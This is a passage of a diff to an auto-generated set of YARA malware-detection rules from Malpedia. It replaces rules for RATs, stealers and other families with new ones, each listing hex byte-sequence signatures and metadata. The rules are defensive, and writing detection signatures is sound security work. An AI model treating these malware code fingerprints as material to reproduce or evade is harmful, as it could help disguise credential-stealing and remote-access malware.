84c0 75f9 6a00 2bca 8d85d0f5ffff } - $sequence_33 = { 8d0d90b87300 ba1b000000 e9???????? a900000080 7517 ebd4 a9ffff0f00 } - $sequence_34 = { e9???????? 894ddc c745e0d8ba6e00 e9???????? c745e0d4ba6e00 eba2 894ddc } - $sequence_35 = { 8b4de8 8b048580f16e00 f644082840 7409 } - $sequence_36 = { 396c2434 750b 396c2430 7505 } + $sequence_0 = { 750a 5e 33c0 5b 83c408 c20c00 8b06 } + $sequence_1 = { bd30000000 33db 85ed 7e0e e8???????? 88441c18 43 } + $sequence_2 = { 6a16 8d4c244c 6800200000 51 57 } + $sequence_3 = { 83ec08 53 56 8b742418 8bd9 85f6 750a } + $sequence_4 = { 5f 5e 5d 5b 81c438200000 c20400 } + $sequence_5 = { 8b542408 668902 b001 c3 668b4801 40 51 } + $sequence_6 = { 85db 751d 807c244802 0f85e0000000 8d542414 8d442448 } + $sequence_7 = { 6a16 8d44244c 52 50 } + $sequence_8 = { 68bb010000 8b39 50 ff15???????? 8b8e20030000 50 53 } + $sequence_9 = { e8???????? 8bf0 eb02 33f6 53 6800040000 8d4c243c } + $sequence_10 = { 50 8bce e8???????? 8d8c2490010000 51 } + $sequence_11 = { 81c428010000 c3 5f 5e 5d 83c8ff 5b } + $sequence_12 = { 8bf1 57 b940000000 33c0 8d7c2415 c644241400 c744240800000000 } + $sequence_13 = { 895c2440 895c2434 895c2438 ff15???????? } + $sequence_14 = { 8b442410 85c0 7408 66837c241400 7510 47 } + $sequence_15 = { 8b3a eb0d 8b8e20030000 68bb010000 } condition: - 7 of them and filesize <393216 + 7 of them and filesize <294912 } -rule MALPEDIA_Elf_Gobrat_Auto : FILE +rule MALPEDIA_Win_Veiledsignal_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4556c50c-642d-5e08-a37f-0bca17aca318" + id = "caf6fec1-c7fc-5e46-9ec5-501cbcaa1f6a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.gobrat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.veiledsignal_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "d983e645d32d0df64baf254a8f8a69a3323d191b1dd7ae64a36bbf4746335d3e" - score = 60 - quality = 35 + logic_hash = "36bfcf538a747481c06e92b8c775b0fad665f748b3dccf3367e494f75f4840ed" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -171495,32 +174250,32 @@ rule MALPEDIA_Elf_Gobrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 48833800 0f8f28020000 488b942428010000 4885d2 7508 e8???????? } - $sequence_1 = { 84c0 745c 488b542430 488b5a30 488b742428 488b4630 488b4e38 } - $sequence_2 = { c644242903 488d055aca3200 488d5c2418 e8???????? 4889c3 488d0546ca3200 e8???????? } - $sequence_3 = { eb41 488d059c311e00 e8???????? 48c740081c000000 488d0d39a62300 488908 31db } - $sequence_4 = { e8???????? 488b942460020000 488b7218 48897020 48837a7000 7542 488d1df7fc3200 } - $sequence_5 = { c3 31c0 488b6c2478 4883ec80 c3 488b8c2488000000 488b4110 } - $sequence_6 = { f7da 410fafd1 89d2 480fafd3 48c1ea2f 4489c6 41c1e008 } - $sequence_7 = { ffd2 b91a000000 4889c7 4889de 31c0 488d1dd7ce2d00 e8???????? } - $sequence_8 = { b825010000 e8???????? 4885c9 745d 4883f902 7712 753c } - $sequence_9 = { e8???????? 48c7400822000000 488d0de4212200 488908 31db 4889d9 488d3d244d2a00 } + $sequence_0 = { 7516 488d05c7390400 4a8b04e8 42385cf839 0f84c2000000 488d05b1390400 } + $sequence_1 = { 488d0dbabb0400 48c7040102000000 b808000000 486bc000 488b0d???????? 48894c0420 b808000000 } + $sequence_2 = { 0f1f440000 488d54244c 488bce e8???????? 488bcb } + $sequence_3 = { 4881c458010000 c3 83f802 7571 488d0516010000 488905???????? 488d0529010000 } + $sequence_4 = { 7ec4 83c8ff eb0b 4803f6 418b84f7a8140100 85c0 } + $sequence_5 = { 81f95a290000 752b 488d0df8030000 b801000000 48890d???????? } + $sequence_6 = { 4c8d0d97960000 498bd1 448d4008 3b0a 742b ffc0 } + $sequence_7 = { e8???????? 488bd7 4c8d05e3270400 83e23f 488bcf 48c1f906 } + $sequence_8 = { 4883ec20 8b1d???????? eb1d 488d0573b10400 ffcb } + $sequence_9 = { ff15???????? 488b55cf 488bc8 ff15???????? 488b4dd7 } condition: - 7 of them and filesize <12853248 + 7 of them and filesize <667648 } -rule MALPEDIA_Win_Innaput_Rat_Auto : FILE +rule MALPEDIA_Win_Turian_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bdbf07bd-d4a4-5362-b354-c606ef8af022" + id = "ddf0a4a2-a5a9-518b-8b9f-2682f3c9390d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.innaput_rat_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turian" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.turian_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "f6067a2a0e56ef408d96b72de49c1461531d24eb998121258442401a90d43684" + logic_hash = "9c66c121bddd393e74452e6591ffaf152302a762e1679695f5fb6277ed317972" score = 75 quality = 75 tags = "FILE" @@ -171534,32 +174289,32 @@ rule MALPEDIA_Win_Innaput_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 59 85c0 7427 ffb720060000 } - $sequence_1 = { ffd7 8b4510 898618060000 8b4514 8b00 } - $sequence_2 = { 8b06 894710 ff7604 035e08 ff5708 56 ff5708 } - $sequence_3 = { 8d7710 eb02 8b36 391e 75fa 6a0c } - $sequence_4 = { 8945fc ff15???????? 33db 395f10 } - $sequence_5 = { ff15???????? ffb718060000 ff15???????? 85c0 } - $sequence_6 = { 8b460c 83f8ff 7404 3bc3 751b } - $sequence_7 = { eb02 8b36 391e 75fa 6a0c ff5704 59 } - $sequence_8 = { 83f8ff 7404 3bc3 751b } - $sequence_9 = { b001 ebd3 55 8bec } + $sequence_0 = { 50 ff15???????? 89450c 8bf8 33c0 } + $sequence_1 = { e8???????? 83c404 85c0 740d 8d4c2410 51 } + $sequence_2 = { ffd7 8b3d???????? 53 ffd7 56 ffd7 83c408 } + $sequence_3 = { 81ec88000000 53 55 56 57 b921000000 33c0 } + $sequence_4 = { 85c0 750a 5f 5e 5d 81c49c000000 c3 } + $sequence_5 = { 729b 53 ff15???????? 83c404 a1???????? 85c0 750f } + $sequence_6 = { 72ba 68???????? ff15???????? 5f 5e 5d 83c8ff } + $sequence_7 = { 66a3???????? 5b c3 6a3f 50 } + $sequence_8 = { 7403 c60000 68???????? 56 ffd7 85c0 } + $sequence_9 = { ffd5 85c0 750e 8d4f46 8d5642 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <645120 } -rule MALPEDIA_Win_Casper_Auto : FILE +rule MALPEDIA_Win_Cloudburst_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "682d09f5-eba1-5466-8515-62dee225f20a" + id = "6b8a23fb-a80e-5e29-b2d9-5270c8f2c8ea" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.casper_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cloudburst_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "901b4babc945e8ca2e1c5355e28b2f0271cc8d172828c522a735944d40fb2e3b" + logic_hash = "308a5032c7dd39db54565ddb9261de5bf1d032e66820b9bf51050b90dd0967a4" score = 75 quality = 75 tags = "FILE" @@ -171573,32 +174328,32 @@ rule MALPEDIA_Win_Casper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 47 57 50 6801000080 e8???????? 85c0 756f } - $sequence_1 = { e8???????? 8b7b34 85ff 7405 e8???????? } - $sequence_2 = { 885006 8b55fc c1ea18 885007 8bd3 c1ea08 885009 } - $sequence_3 = { 51 a1???????? 85c0 751a e8???????? 689c9678bf 68???????? } - $sequence_4 = { 837de803 752a 837df808 8b75f4 7514 85f6 742b } - $sequence_5 = { 8bbb48010000 8b8b68010000 33d2 8bc7 f7f1 85d2 7406 } - $sequence_6 = { 8bd8 8d4510 50 81ce19000200 } - $sequence_7 = { 85ff 7405 e8???????? 8bce e8???????? 5f 5e } - $sequence_8 = { 50 57 57 6800000008 53 57 57 } - $sequence_9 = { 7504 8bde eb03 83c305 68???????? 53 e8???????? } + $sequence_0 = { 4533c2 4133e8 45894424f8 41896c24fc 8bc5 } + $sequence_1 = { 4883ec08 8b05???????? 41be01000000 4c892c24 85c0 } + $sequence_2 = { 4c892c24 85c0 4c8bd9 4c8bd2 410f44c6 4533ed } + $sequence_3 = { 488b0d???????? 488d542444 4533c9 4533c0 488bf8 418bdd ff15???????? } + $sequence_4 = { 458942f4 458b4c24f8 418bc1 c1e818 } + $sequence_5 = { ba00080000 488bcb e8???????? 4c8d442430 } + $sequence_6 = { 8b05???????? 41be01000000 4c892c24 85c0 4c8bd9 } + $sequence_7 = { 03c2 8bc8 83e00f 3bc2 7407 } + $sequence_8 = { 33d6 41891424 4133d3 33fa 4189542404 33df 41897c2408 } + $sequence_9 = { 41b904000000 4c8d442440 418d5101 ff15???????? 85c0 74b1 } condition: - 7 of them and filesize <434176 + 7 of them and filesize <2363392 } -rule MALPEDIA_Win_Bbsrat_Auto : FILE +rule MALPEDIA_Win_Svcready_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1bf7f125-76bf-51d8-8714-b1f4351a2fc5" + id = "18ab3505-c0ef-5267-b797-184b8eb52424" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bbsrat_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.svcready_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "d09c46b568c20e6cc1497fd9b00b10dfec3bd249a240c9cb1f2d27667bcf264d" + logic_hash = "e011f730891f501adbcafbb04605066e1d9bcba49b0031ae67a9bae5fc387ad9" score = 75 quality = 75 tags = "FILE" @@ -171612,32 +174367,32 @@ rule MALPEDIA_Win_Bbsrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8b7c2410 81c610020000 d1eb 45 85db 75b5 } - $sequence_1 = { 83c8ff 898e44020000 899648020000 57 894308 894304 8903 } - $sequence_2 = { 03c0 03c0 50 898374010000 e8???????? 8b8b74010000 83c404 } - $sequence_3 = { 8be5 5d c20c00 51 e8???????? 5e 5b } - $sequence_4 = { ffd7 895e24 8b461c 3bc3 741a 53 50 } - $sequence_5 = { eb21 83f805 7529 8d8c243c010000 51 8d842448030000 e8???????? } - $sequence_6 = { ff15???????? 8bf8 6a10 56 6861001100 } - $sequence_7 = { 52 8d6e18 55 8d7e0c 57 894608 e8???????? } - $sequence_8 = { ffd7 a3???????? 85c0 7412 8d4c2408 51 } - $sequence_9 = { 6a00 52 8bd8 56 895c2428 ff15???????? 8b4f0c } + $sequence_0 = { 33c8 c1ca0d 33ce 8bc3 33c1 c1ce03 894c2418 } + $sequence_1 = { 83611000 c741140f000000 68???????? c60100 e8???????? 8365fc00 } + $sequence_2 = { 59 59 895dc0 895dc4 895dc8 8b4df4 8bc6 } + $sequence_3 = { 8904d1 56 ff742410 8d4f04 e8???????? 8b44240c 5f } + $sequence_4 = { 8bd8 8a0b 80f97f 0f855fffffff 8b54240c 8b4d18 } + $sequence_5 = { d1cb 33d5 8bc7 c1e003 33da c1cd07 } + $sequence_6 = { 33c3 8bd7 33c5 0bd3 8bda 0bd1 33d9 } + $sequence_7 = { e8???????? 83c414 eb1a 53 57 e8???????? 668b442430 } + $sequence_8 = { c645fc01 8d45d8 ff7508 53 6a10 83ec18 8bcc } + $sequence_9 = { 7607 bbffffff7f eb0a b816000000 3bd8 0f42d8 8d4b01 } condition: - 7 of them and filesize <434176 + 7 of them and filesize <1187840 } -rule MALPEDIA_Win_Hopscotch_Auto : FILE +rule MALPEDIA_Win_Narilam_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dd6bd925-f81a-5efa-b164-a58190829fd7" + id = "da9d4048-8edf-5bad-820f-4e60bf8a1167" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hopscotch_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.narilam_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "1aacad185595691b5a0f903be6e5a023d3d5227283438abf4c811f89adcac931" + logic_hash = "9c97c97f1983ca4888bd0ceffb3db6cc9301c52fb6e7adafbcc7af03cf7073fe" score = 75 quality = 75 tags = "FILE" @@ -171651,32 +174406,32 @@ rule MALPEDIA_Win_Hopscotch_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b1d???????? 8d8c24a4010000 6a00 6a00 6a03 6a00 } - $sequence_1 = { 5b 81c400010000 c3 8b8c2410010000 51 57 } - $sequence_2 = { ffd7 56 53 8d4c2414 6a08 51 e8???????? } - $sequence_3 = { ffd7 85c0 753c 8b35???????? ffd6 83f802 742f } - $sequence_4 = { 7554 33f6 89b5dcfeffff 8b3d???????? 83fe05 7332 } - $sequence_5 = { 81ec80090000 53 56 57 68???????? e8???????? } - $sequence_6 = { 68???????? e8???????? 83c408 8d9424a8020000 } - $sequence_7 = { 56 57 ff15???????? 85c0 7514 8d442414 } - $sequence_8 = { c7442400ffffffff 50 c7442408ffffffff e8???????? 83c404 8d4c2400 } - $sequence_9 = { 8b3d???????? 83c408 8d442408 50 ffd7 } + $sequence_0 = { e8???????? f645f801 7518 8d55f4 a1???????? e8???????? 8b45f4 } + $sequence_1 = { 8d8550ffffff ba02000000 e8???????? 66c785dcfeffffe801 ba???????? 8d854cffffff e8???????? } + $sequence_2 = { e8???????? 8b55fc 8bc6 e8???????? 8bf8 e9???????? 8d5308 } + $sequence_3 = { eb83 e9???????? 66b86801 ebf5 66b86901 ebef 66b86a01 } + $sequence_4 = { e8???????? eb08 8b45fc e8???????? 33c0 5a 59 } + $sequence_5 = { e8???????? c3 3a90e2020000 740b 8890e2020000 e8???????? c3 } + $sequence_6 = { e8???????? 8bc8 8bd3 8b831c020000 ff9318020000 33c0 8a45ff } + $sequence_7 = { a5 a5 a5 8d4584 8d4dd4 ba04000000 e8???????? } + $sequence_8 = { ff852cffffff 8d5588 8d45fc e8???????? ff8d2cffffff 8d4588 ba02000000 } + $sequence_9 = { 8d8580feffff e8???????? ff854cfeffff 8d9580feffff 8d45fc e8???????? ff8d4cfeffff } condition: - 7 of them and filesize <1143808 + 7 of them and filesize <3325952 } -rule MALPEDIA_Win_Cmsbrute_Auto : FILE +rule MALPEDIA_Win_Mokes_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8f79cbd4-e913-5f2c-8c88-b934c5aa8f71" + id = "5228f490-0d80-56e9-a8cc-72e35ac44ea7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cmsbrute_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mokes_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "9b2fd3bf8cbe0036d7312658e08a3f69e7f5e49973eb02bc9f177311ac61fa60" + logic_hash = "be97fd0567c8d98c1350b6cf1d21361ab6916096a99c6915f04160ab0a34cb53" score = 75 quality = 75 tags = "FILE" @@ -171690,117 +174445,71 @@ rule MALPEDIA_Win_Cmsbrute_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff7004 51 ff7510 8b4d08 ff750c 56 e8???????? } - $sequence_1 = { e8???????? ff4de0 8bde 75e4 8b75d8 832700 6a00 } - $sequence_2 = { ffb068010000 ff15???????? 8b06 83a06801000000 8b442418 59 59 } - $sequence_3 = { eb0f e8???????? 59 50 8d75b4 e8???????? 59 } - $sequence_4 = { eb02 8b01 3945fc 0f8d8a000000 8b45fc e8???????? 8bf0 } - $sequence_5 = { ff75c4 8b4dcc ff75d4 8bd8 0fb7463e 50 53 } - $sequence_6 = { eb02 33ff 8bb59cfdffff 51 e8???????? 59 85ff } - $sequence_7 = { ff75e4 57 e8???????? 83c414 85c0 7425 8bf7 } - $sequence_8 = { ff742430 e8???????? 89442430 8b4304 8378041b 8b30 8b7808 } - $sequence_9 = { ff15???????? 8945cc 8b35???????? 83cfff 3bdf 7403 53 } + $sequence_0 = { f6c101 0f85b0000000 8b442424 8b00 3d???????? 0f849f000000 8b4804 } + $sequence_1 = { f20f1001 660f2fc1 0f28c3 f20f5cc7 0f47c1 f20f1008 f20f59c2 } + $sequence_2 = { ff9050010000 8b8bac010000 8d83ac010000 89442424 85c9 740b 83790400 } + $sequence_3 = { ff5030 89442410 83f8ff 7512 8b4508 c700???????? 5f } + $sequence_4 = { f20f1025???????? f30fe6db f30fe6d2 f30fe6c9 f30fe6c0 f20f59dc f20f59d4 } + $sequence_5 = { ffd0 8d4900 3d???????? 0f84cb000000 8b00 85c0 75ef } + $sequence_6 = { e8???????? 8d4e14 e8???????? 8d4e34 e8???????? 5f 5e } + $sequence_7 = { ff750c c70000000000 e8???????? 8b4508 8bce c706???????? c74608???????? } + $sequence_8 = { e8???????? 8b75e4 8b4e0c 03ce 8b4604 8d0445feffffff 50 } + $sequence_9 = { f20f1005???????? 660f2fc1 0f82ac010000 f20f108e88000000 f20f109690000000 f20f5c9680000000 f20f5c4e78 } condition: - 7 of them and filesize <5275648 + 7 of them and filesize <18505728 } -rule MALPEDIA_Win_Cobra_Auto : FILE +rule MALPEDIA_Win_Risepro_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "962ae883-d522-5f88-b272-e61709553508" + id = "aea6ceb4-8818-596f-b0ea-b016b3dee8c1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cobra_auto.yar#L1-L488" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.risepro_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "0f157bf0768b0eaaf80d53d6edd02f203144bcb1fce66a02d72ea93d53a8a5ec" + logic_hash = "4bf4a4e2719baa2456fbc7c987c0d3507fd8f7c3c54ce53243c1cdc1f6723c61" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" malpedia_rule_date = "20231130" malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { 7511 e8???????? 85c0 7508 ff15???????? } - $sequence_1 = { ff25???????? 53 56 57 8bd9 33f6 } - $sequence_2 = { 7514 391d???????? 754d 33c0 } - $sequence_3 = { 85c0 0f8e8c000000 83e801 8905???????? } - $sequence_4 = { 751c 8bcf ff15???????? 8d8fe8030000 8bf9 } - $sequence_5 = { 757f 8b05???????? 85c0 0f8e8c000000 } - $sequence_6 = { 5b c3 85db 7405 83fb03 } - $sequence_7 = { 85c0 750e 3905???????? 7e2c ff0d???????? 83f801 8b0d???????? } - $sequence_8 = { e8???????? 85c0 750e 33ff 8bc7 } - $sequence_9 = { 5f 5e 5b c3 85ff 7418 } - $sequence_10 = { 753c b980000000 e8???????? 85c0 a3???????? 7504 33c0 } - $sequence_11 = { 5e 5b c3 83fb01 7405 83fb02 } - $sequence_12 = { 33d2 b9e8030000 f7f1 83f805 } - $sequence_13 = { c9 c3 3ac8 7606 8ad1 } - $sequence_14 = { d2e0 0802 ff45f8 837df808 7c0b 8a041f 47 } - $sequence_15 = { e8???????? 83c410 85c0 7517 ff7520 ff751c } - $sequence_16 = { 7407 33c0 e9???????? ff15???????? e9???????? } - $sequence_17 = { 7f07 e8???????? eb26 83c0ff } - $sequence_18 = { e8???????? eb6d e8???????? 85c0 } - $sequence_19 = { e8???????? 33db 3bc3 741a } - $sequence_20 = { e8???????? 8bc7 eb0e 4883c108 e8???????? b801005921 } - $sequence_21 = { 85c0 7564 488b0b 488b01 } - $sequence_22 = { ff5024 488d4d08 e8???????? 488d4d08 e8???????? 488bcd } - $sequence_23 = { ff501c 488d4d08 e8???????? 498bce e8???????? 48832700 ba02000000 } - $sequence_24 = { ff5064 488b0e 4883c108 e8???????? 488b5c2430 488b6c2438 488b742440 } - $sequence_25 = { 83781400 750a b865005921 e9???????? } - $sequence_26 = { 8bec 56 6a00 6880000000 6a03 6a00 6a03 } - $sequence_27 = { 83feff 7505 33c0 5e 5d c3 8b4d08 } - $sequence_28 = { 6a03 68000000c0 50 ff15???????? 8bf0 83feff 7505 } - $sequence_29 = { 83c0fe 668b4802 83c002 663bcb 75f4 8b15???????? 8b0d???????? } - $sequence_30 = { 8908 8b0d???????? 895004 894808 33c0 } - $sequence_31 = { c3 8b4d08 57 51 6a00 } - $sequence_32 = { 6689440ffc 6685c0 75ee f685c003000010 } - $sequence_33 = { 8d45e8 50 6a00 6aff e8???????? 85c0 } - $sequence_34 = { 68???????? 51 ffd6 83c40c 6a28 } - $sequence_35 = { ff15???????? 83f87a 740b 3d230000c0 } - $sequence_36 = { 8b7d0c 3bc3 7508 3bfb } - $sequence_37 = { ff15???????? 488bcf ff15???????? 41b701 } - $sequence_38 = { 48894c2450 4c89642448 488d4c2468 48894c2440 4c89642438 } - $sequence_39 = { 75e8 85f6 74e4 418936 b801000000 4881c4480d0000 } - $sequence_40 = { 48f7d1 66837c4bfc5c 7413 488bfb 4883c9ff 66f2af 8b05???????? } - $sequence_41 = { 8d8588feffff 68???????? 50 ff15???????? 83c42c } - $sequence_42 = { b914000000 84c0 0f45f9 488bce } - $sequence_43 = { 488bce 8bd7 ff15???????? 85c0 } - $sequence_44 = { 7507 32c0 e9???????? c745b818000000 } - $sequence_45 = { 668b08 83c002 6685c9 75f5 2bc2 d1f8 66837c43fe5c } - $sequence_46 = { 05a1000000 50 8d84249c0d0000 68???????? } - $sequence_47 = { 0f8456feffff 807c241301 6800080000 0f8544020000 } - $sequence_48 = { 0f8431ffffff 8b4d08 5f 8931 } - $sequence_49 = { 0f84100f0000 6800080000 57 56 } - $sequence_50 = { 05a2000000 50 8d94249c0d0000 68???????? } - $sequence_51 = { 05a2000000 50 8d8c249c0d0000 68???????? } - $sequence_52 = { 668cc8 c3 53 50 } - $sequence_53 = { 85c0 740a b8050000c0 e9???????? } - $sequence_54 = { c745bc04390100 66c745d81800 66c745da1a00 c745dc10390100 } - $sequence_55 = { c745bc01000000 c745c000000000 6a00 6a00 8d55ac 52 } + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { 0fb645ff 50 8b4de8 e8???????? 8b4dec 83c901 894dec } + $sequence_1 = { e8???????? 8945c8 8d4d0c e8???????? 8945cc 8d45d7 50 } + $sequence_2 = { 8bec 83ec0c 8955f8 894dfc 8b4dfc e8???????? 8bc8 } + $sequence_3 = { 894214 8b4df8 e8???????? 8945d4 837de010 } + $sequence_4 = { 8bcc 8965bc 8d552c 52 e8???????? 8945b8 c645fc04 } + $sequence_5 = { 33c0 8885eafeffff 33c9 888de9feffff } + $sequence_6 = { 6800000080 680000cf00 68???????? 68???????? 6800020000 ff15???????? 89859cfeffff } + $sequence_7 = { 6886e4fa74 6829895415 e8???????? 8b4dfc 894108 89510c } + $sequence_8 = { 33c5 8945ec 56 50 8d45f4 64a300000000 894da8 } + $sequence_9 = { 85ff 780f 3b3d???????? 7307 } condition: - 7 of them and filesize <1368064 + 7 of them and filesize <280576 } -rule MALPEDIA_Win_Snowflake_Stealer_Auto : FILE +rule MALPEDIA_Win_Hawkball_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c75b333a-682d-594f-91c1-b34498f1ad6e" + id = "e8db5e2d-29c9-5590-a712-0f60cd9571dc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snowflake_stealer_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hawkball_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "245c81a71d2d7616cdb88580467328ff9d430753f4cd71b549a9003edd26959a" + logic_hash = "781a6bce01e178f537c586fc2b1e607c4503cf63fe51435a8db976da2766e5fa" score = 75 quality = 75 tags = "FILE" @@ -171814,34 +174523,34 @@ rule MALPEDIA_Win_Snowflake_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f20f114740 0fb64111 894738 89473c ff5308 8b542418 59 } - $sequence_1 = { f30fe6c0 660f2fc8 7623 84d2 750a f30f1048fc 0f5ac9 } - $sequence_2 = { f20f1000 f20f1106 8b4008 c7030a000000 894608 53 56 } - $sequence_3 = { eb54 8b54241c 8d4c2474 e8???????? 8b44247c 8b8c2480000000 31f6 } - $sequence_4 = { ff753c ff74241c e8???????? 59 59 83650800 83650c00 } - $sequence_5 = { ff7010 ff700c ff7110 ff710c ff7608 ff560c 83c414 } - $sequence_6 = { ff750c e8???????? 83c410 5f 8bc6 5e 5b } - $sequence_7 = { ff742428 e8???????? 50 53 56 e8???????? 8bd8 } - $sequence_8 = { c745f001000000 894ddc 51 8945e0 ff500c 83c404 8b45e0 } - $sequence_9 = { ff7310 e8???????? 8bf0 83c40c 85f6 756f 55 } + $sequence_0 = { 83780c00 7506 33c0 8be5 } + $sequence_1 = { 53 e8???????? 037dfc 83c40c 81ffffff0300 } + $sequence_2 = { 0f84c6000000 6a04 8d442418 c744241860ea0000 50 6a06 57 } + $sequence_3 = { 53 ff15???????? ff742414 8b35???????? ffd6 53 } + $sequence_4 = { 85c9 746d 837dfc28 7d13 6b55fc05 69c2e8030000 } + $sequence_5 = { 50 ff15???????? 897001 c600ff c7400500000000 } + $sequence_6 = { b9???????? e8???????? a3???????? 833d????????00 740b 8b0d???????? } + $sequence_7 = { 837dfc28 7d13 6b55fc05 69c2e8030000 50 } + $sequence_8 = { 7405 8d4a10 eb47 b911000000 } + $sequence_9 = { 8be5 5d c3 6a59 ff15???????? 85c0 } condition: - 7 of them and filesize <6196224 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Latentbot_Auto : FILE +rule MALPEDIA_Win_Remexi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "02ad78f6-9191-5ecc-84c6-a6e6dbb03fa8" + id = "687f133c-aa4c-5c82-a16b-c166cd521a0e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.latentbot_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remexi_auto.yar#L1-L209" license_url = "N/A" - logic_hash = 